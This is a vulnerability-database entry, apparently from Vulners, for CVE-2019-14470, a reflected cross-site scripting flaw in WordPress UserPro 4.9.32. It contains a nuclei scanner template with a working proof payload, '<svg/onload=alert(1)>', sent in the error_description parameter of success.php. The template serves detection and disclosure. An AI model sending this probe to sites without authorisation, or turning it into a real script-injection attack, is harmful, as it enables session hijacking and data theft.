Lucene search
K

WordPress UserPro 4.9.32 - Cross-Site Scripting

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 42 Views

WordPress UserPro 4.9.32 could allow XSS via Instagram PHP API (v2) in success.php error_description parameter, leading to session hijacking, defacement, or data theft

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress UserPro 4.9.32 Plugin - Cross-Site Scripting Vulnerability
26 Aug 201900:00
zdt
Circl
CVE-2019-14470
24 May 202216:55
circl
CNVD
WordPress UserPro Plugin Cross-Site Scripting Vulnerability
27 Aug 201900:00
cnvd
CVE
CVE-2019-14470
4 Sep 201919:24
cve
Cvelist
CVE-2019-14470
4 Sep 201919:24
cvelist
Exploit DB
WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting
26 Aug 201900:00
exploitdb
exploitpack
WordPress Plugin UserPro 4.9.32 - Cross-Site Scripting
26 Aug 201900:00
exploitpack
Github Security Blog
Cosenary Instagram-PHP-API contains reflected XSS vulnerability
24 May 202216:55
github
NVD
CVE-2019-14470
4 Sep 201920:15
nvd
OSV
CVE-2019-14470
4 Sep 201920:15
osv
Rows per page
id: CVE-2019-14470

info:
  name: WordPress UserPro 4.9.32 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of UserPro or apply the provided patch to fix the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/9815
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470
    - http://packetstormsecurity.com/files/154206/WordPress-UserPro-4.9.32-Cross-Site-Scripting.html
    - https://wpvulndb.com/vulnerabilities/9815
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14470
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-14470
    cwe-id: CWE-79
    epss-score: 0.82962
    epss-percentile: 0.99633
    cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: "instagram-php-api_project"
    product: "instagram-php-api"
  tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/plugins/userpro/'

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<svg/onload=alert(1)>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202d26477aeb49de7a0571ab94ef402aede53c714273c73d77b997b2da265b7824022100849d5fc888a686f163c74704a136537225bbe16667c3b154390f97f53e4b89cf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 36.1
EPSS0.82962
42